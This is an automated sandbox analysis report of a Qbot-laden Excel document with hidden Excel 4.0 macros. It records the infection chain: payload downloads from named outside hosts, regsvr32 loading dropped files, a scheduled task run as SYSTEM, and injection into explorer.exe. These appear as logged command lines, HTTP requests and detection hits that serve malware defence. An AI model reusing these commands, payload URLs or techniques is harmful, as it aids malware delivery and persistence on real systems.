Windows Analysis Report SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls

Overview

General Information

Sample Name: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls
Analysis ID: 493727
MD5: 7b83b99dace5664b9ab5c0c3882be408
SHA1: 4c4893beca92234c023ee2dfff759e155c643ed3
SHA256: e005a59b0ab458c8a1ab6883e17504382bd72d2e9de8eb99c785de520c258c0c
Tags: xlsx
Detection

Hidden Macro 4.0 Qbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Qbot
Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Sigma detected: Schedule system process
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Regsvr32 Command Line Without DLL
Machine Learning detection for dropped file
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Yara detected hidden Macro 4.0 in Excel
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5340 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 7012 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 6932 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test MD5: 426E7499F6A7346F0410DEAD0805586B)
      • explorer.exe (PID: 6888 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
        • schtasks.exe (PID: 3016 cmdline: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtwplfwnel /tr 'regsvr32.exe -s \'C:\Datop\test1.test\'' /SC ONCE /Z /ST 23:48 /ET 24:00 MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • regsvr32.exe (PID: 5528 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

Threatname: Qbot

{"Bot id": "tr", "Campaign": "1632817399", "Version": "402.363"}

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x3a8aa:$s1: Excel
  • 0x3b94a:$s1: Excel
  • 0x34cf:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls | JoeSecurity_HiddenMacro | Yara detected hidden Macro 4.0 in Excel | Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
00000009.00000003.380505097.0000000003320000.00000040.00000001.sdmp | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security

Unpacked PEs

Source | Rule | Description | Author | Strings
9.3.regsvr32.exe.33330bf.0.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
9.2.regsvr32.exe.10000000.0.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
17.2.explorer.exe.af0000.0.raw.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
17.2.explorer.exe.af0000.0.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security
9.3.regsvr32.exe.33330bf.0.raw.unpack | JoeSecurity_Qbot_1 | Yara detected Qbot | Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started, Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5340, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test, ProcessId: 7012
Sigma detected: Regsvr32 Command Line Without DLL
Source: Process started, Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\explorer.exe, NewProcessName: C:\Windows\SysWOW64\explorer.exe, OriginalFileName: C:\Windows\SysWOW64\explorer.exe, ParentCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test, ParentImage: C:\Windows\SysWOW64\regsvr32.exe, ParentProcessId: 6932, ProcessCommandLine: C:\Windows\SysWOW64\explorer.exe, ProcessId: 6888

Persistence and Installation Behavior:

Sigma detected: Schedule system process
Source: Process started, Author: Joe Security: Data: Command: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtwplfwnel /tr 'regsvr32.exe -s \'C:\Datop\test1.test\'' /SC ONCE /Z /ST 23:48 /ET 24:00, CommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtwplfwnel /tr 'regsvr32.exe -s \'C:\Datop\test1.test\'' /SC ONCE /Z /ST 23:48 /ET 24:00, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 6888, ProcessCommandLine: 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtwplfwnel /tr 'regsvr32.exe -s \'C:\Datop\test1.test\'' /SC ONCE /Z /ST 23:48 /ET 24:00, ProcessId: 3016

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 17.2.explorer.exe.af0000.0.unpack, Malware Configuration Extractor: Qbot {"Bot id": "tr", "Campaign": "1632817399", "Version": "402.363"}
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls, Virustotal: Detection: 15%
Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls, ReversingLabs: Detection: 22%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\key[1].gif, Joe Sandbox ML: detected
Source: C:\Datop\test1.test, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown, HTTPS traffic detected: 199.79.63.251:443 -> 192.168.2.3:49724 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 162.251.80.22:443 -> 192.168.2.3:49738 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 162.222.225.250:443 -> 192.168.2.3:49752 version: TLS 1.2
Source: Binary string: amstream.pdb source: explorer.exe, 00000011.00000003.389173855.0000000004BA1000.00000004.00000001.sdmp
Source: Binary string: c:\Bed\gone\91\Receive\Strai\what.pdb source: explorer.exe, 00000011.00000003.389474880.0000000004BA1000.00000004.00000001.sdmp, key[1].gif.0.dr
Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000011.00000003.389173855.0000000004BA1000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe, Code function: 9_2_1000AEF6 FindFirstFileW,FindNextFileW,9_2_1000AEF6
Source: C:\Windows\SysWOW64\explorer.exe, Code function: 17_2_00AFAEF6 FindFirstFileW,FindNextFileW,17_2_00AFAEF6

Software Vulnerabilities:

Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File created: key[1].gif.0.dr
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\regsvr32.exe
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Section loaded: unknown origin: URLDownloadToFileA
Source: global traffic, DNS query: name: gillcart.com
Source: global traffic, TCP traffic: 192.168.2.3:49724 -> 199.79.63.251:443
Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View, IP Address: 199.79.63.251
Source: Joe Sandbox View, IP Address: 162.251.80.22
Source: Joe Sandbox View, IP Address: 162.222.225.250
Source: global traffic, HTTP traffic detected:
  GET /Cdpmoyhr/key.xml HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: gillcart.com
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  GET /MeOlE9Xxd/key.xml HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: geit.in
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  GET /9DPZqAfZdq5z/key.xml HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
  Host: mercanets.com
  Connection: Keep-Alive
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown, Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown, Network traffic detected: HTTP traffic on port 49738 -> 443
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Wed, 29 Sep 2021 21:45:38 GMT
  Server: Apache
  Upgrade: h2,h2c
  Connection: Upgrade, close
  Vary: Accept-Encoding
  Transfer-Encoding: chunked
  Content-Type: text/html;charset=utf-8
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://onedrive.live.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://onedrive.live.com/embed?
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://osi.office.net
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://outlook.office.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://outlook.office.com/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://outlook.office365.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://outlook.office365.com/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://pages.store.office.com/review/query
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://powerlift.acompli.net
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://roaming.edog.
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://settings.outlook.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://shell.suite.office.com:1443
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://skyapi.live.net/Activity/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://staging.cortana.ai
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://store.office.cn/addinstemplate
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://store.office.com/addinstemplate
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://store.office.de/addinstemplate
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://tasks.office.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://web.microsoftstream.com/video/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://webshell.suite.office.com
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://wus2.contentsync.
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://wus2.pagecontentsync.
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
                  Source: 91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drString found in binary or memory: https://www.odwebp.svc.ms
                  Source: unknown DNS traffic detected: queries for: gillcart.com
                  Source: global traffic HTTP traffic detected: GET /Cdpmoyhr/key.xml HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: gillcart.com Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /MeOlE9Xxd/key.xml HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: geit.in Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /9DPZqAfZdq5z/key.xml HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: mercanets.com Connection: Keep-Alive
                  Source: unknown HTTPS traffic detected: 199.79.63.251:443 -> 192.168.2.3:49724 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 162.251.80.22:443 -> 192.168.2.3:49738 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 162.222.225.250:443 -> 192.168.2.3:49752 version: TLS 1.2

                  System Summary:

                  Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
                  Source: Document image extraction number: 0 Screenshot OCR: Enable Editing 0 PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless yo
                  Source: Document image extraction number: 0 Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
                  Source: Document image extraction number: 1 Screenshot OCR: Enable Editing (D PROTECTED VIEW Be careful - files from the Internet can contain viruses. Unless y
                  Source: Document image extraction number: 1 Screenshot OCR: Enable Content OSECURITY WARNING Macros have been disabled. Enable Content om If you are using a m
                  Office process drops PE file
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\key[1].gif
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Datop\test1.test
                  Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1000C702 NtCreateSection,DefWindowProcA,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,GetCurrentProcess,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,GetCurrentProcess,NtUnmapViewOfSection,NtClose, 9_2_1000C702
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1000CBB9 memset,GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,FreeLibrary, 9_2_1000CBB9
                  Source: test1.test.17.dr Static PE information: No import functions for PE file found
                  Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
                  Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls OLE indicator, VBA macros: true
                  Source: key[1].gif.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: test1.test.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: test1.test.17.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls Virustotal: Detection: 15%
                  Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls ReversingLabs: Detection: 22%
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                  Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
                  Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn xtwplfwnel /tr 'regsvr32.exe -s \'C:\Datop\test1.test\'' /SC ONCE /Z /ST 23:48 /ET 24:00
                  Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{AB7EB1E0-7A7B-49DE-9068-ABA03EDAFB4F} - OProcSessId.dat
                  Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@12/4@3/3
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1000D565 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket, 9_2_1000D565
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File read: C:\Users\desktop.ini
                  Source: SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls OLE indicator, Workbook stream: true
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1000ABE5 CreateToolhelp32Snapshot,memset,Process32First,Process32Next,CloseHandle, 9_2_1000ABE5
                  Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_01
                  Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{D7C8E493-027B-48BC-9971-06DCE9DBCF24}
                  Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{F6BD3F44-6AC4-4334-A4C3-8B85DC2E1690}
                  Source: C:\Windows\SysWOW64\explorer.exe Mutant created: \Sessions\1\BaseNamedObjects\{D7C8E493-027B-48BC-9971-06DCE9DBCF24}
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1000A55C FindResourceA, 9_2_1000A55C
                  Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\explorer.exe
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Automated click: OK
                  Source: C:\Windows\SysWOW64\regsvr32.exe Automated click: OK
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
                  Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll
                  Source: Binary string: amstream.pdb source: explorer.exe, 00000011.00000003.389173855.0000000004BA1000.00000004.00000001.sdmp
                  Source: Binary string: c:\Bed\gone\91\Receive\Strai\what.pdb source: explorer.exe, 00000011.00000003.389474880.0000000004BA1000.00000004.00000001.sdmp, key[1].gif.0.dr
                  Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000011.00000003.389173855.0000000004BA1000.00000004.00000001.sdmp
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10021257 push dword ptr [ecx+04h]; ret 9_2_100212C2
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1002671A push edx; retf 9_2_10026721
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_10025F49 push ebx; retf 9_2_10025F4E
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 9_2_1002414E push cs; retf 9_2_1002415A
